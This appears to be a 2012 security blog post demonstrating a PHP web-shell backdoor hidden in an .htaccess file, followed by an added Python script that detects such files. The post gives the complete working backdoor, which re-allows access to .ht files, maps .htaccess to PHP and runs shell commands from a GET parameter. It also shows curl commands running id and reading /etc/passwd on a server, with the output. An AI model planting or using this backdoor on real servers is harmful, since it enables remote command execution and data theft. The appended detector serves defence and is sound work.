PHP backdoor: .htaccess
Posted on 2012-8-26 20:40:05
RE :http://d.fuzzexp.org/?p=845#toc-e5889be5bbba-htaccess
http://www.cao.com/forum.php?mod=viewthread&tid=369&extra=page%3D1
Parsed as PHP
If we have upload permission and upload the .htaccess to the current directory, then…
    root@ubuntu:/var/www# cat .htaccess
    <Files ~ "^\.ht">
        Order allow,deny
        Allow from all
    </Files>
    AddType application/x-httpd-php .htaccess

    ###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
    root@ubuntu:/var/www#
On UBUNTU1:
    root@Dis9Team:/tmp# curl http://5.5.5.3/.htaccess?c=id;pwd;ls;uname -a;

        Order allow,deny
        Allow from all

    AddType application/x-httpd-php .htaccess

    ###### SHELL ######
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    ###### LLEHS ######
    /tmp
    Ghost-Phisher              keyring-Y8QdXP  orbit-root          pulse-PKdhtXMmr18n  virtual-root.TsJe3L
    ghost-phisher_1.3_all.deb  orbit-gdm       pulse-2L9K88eMlGn7  ssh-Hqkmohvj1305    vmware-root
    Linux Dis9Team 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:50 UTC 2011 i686 i686 i386 GNU/Linux
    root@Dis9Team:/tmp#
Viewing a file
    root@Dis9Team:/tmp# GET http://5.5.5.3/.htaccess?c=cat /etc/passwd

        Order allow,deny
        Allow from all

    AddType application/x-httpd-php .htaccess

    ###### SHELL ######
    ###### LLEHS ######
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    syslog:x:101:103::/home/syslog:/bin/false
    messagebus:x:102:105::/var/run/dbus:/bin/false
    avahi-autoipd:x:103:108:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
    avahi:x:104:109:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
    usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false
    gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
    speech-dispatcher:x:107:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
    kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
    pulse:x:109:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
    rtkit:x:110:119:RealtimeKit,,,:/proc:/bin/false
    hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
    saned:x:112:121::/home/saned:/bin/false
    brk:x:1000:1000:Dis9Team,,,:/home/brk:/bin/bash
    postgres:x:113:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    smmta:x:114:124:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
    smmsp:x:115:125:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
    vboxadd:x:999:1::/var/run/vboxadd:/bin/false
    sshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin
    root@Dis9Team:/tmp#
What this .htaccess file means
    <Files ~ "^\.ht">
        Order allow,deny
        Allow from all
    </Files>
    AddType application/x-httpd-php .htaccess

    ###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######

AddType application/x-httpd-php .htaccess: .htaccess is parsed as a PHP script

The part below it is the backdoor
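A defender's check for the file this post describes, added here as an example and not part of the original post: it scans the text of a .htaccess file for the three markers shown above (HTTP access to .ht* files re-allowed, a PHP handler mapping, an embedded PHP open tag). The function names and the sample strings are constructed for illustration, and the PHP body in the sample is elided.

```python
import fnmatch
import re

FILES_OPEN = re.compile(r'^\s*<Files(Match)?\s+(~\s*)?"?([^">]+)"?\s*>', re.I)
FILES_CLOSE = re.compile(r'^\s*</Files', re.I)
ALLOW_ALL = re.compile(r'^\s*(Allow\s+from\s+all|Require\s+all\s+granted)\b', re.I)
PHP_HANDLER = re.compile(r'^\s*(AddType|AddHandler|SetHandler|ForceType)\b.*php', re.I)
PHP_CODE = re.compile(r'<\?(php|=)', re.I)

def covers_htaccess(match):
    """True if a <Files>/<FilesMatch> pattern applies to the name '.htaccess'."""
    is_regex, pattern = bool(match.group(1) or match.group(2)), match.group(3)
    if not is_regex:
        return fnmatch.fnmatch(".htaccess", pattern)
    try:
        return re.search(pattern, ".htaccess") is not None
    except re.error:
        return True  # unparseable pattern: report it rather than skip it

def audit_htaccess(text):
    """Return [(line_no, finding)] for the text of one .htaccess file."""
    findings, in_ht_section = [], False
    for no, line in enumerate(text.splitlines(), 1):
        opened = FILES_OPEN.match(line)
        if opened:
            in_ht_section = covers_htaccess(opened)
        elif FILES_CLOSE.match(line):
            in_ht_section = False
        elif in_ht_section and ALLOW_ALL.match(line):
            findings.append((no, "re-allows HTTP access to .ht* files"))
        if PHP_HANDLER.match(line):
            findings.append((no, "maps files to the PHP handler"))
        if PHP_CODE.search(line):  # comment lines count: PHP still runs them
            findings.append((no, "PHP open tag inside .htaccess"))
    return findings

# Constructed samples: the file layout from the post, and an ordinary rewrite file.
POSTED = r'''<Files ~ "^\.ht">
    Order allow,deny
    Allow from all
</Files>
AddType application/x-httpd-php .htaccess
###### SHELL ###### <?php /* body elided */ ?>###### LLEHS ######
'''
BENIGN = "RewriteEngine On\nRewriteRule ^index\\.html$ index.php [L]\n"

if __name__ == "__main__":
    for no, finding in audit_htaccess(POSTED):
        print(no, finding)
```

Apache's stock configuration denies HTTP access to .ht* files, which is what the `<Files>` block in the posted file overrides. With `AllowOverride None` set for upload directories in the server configuration, an uploaded .htaccess is not read at all.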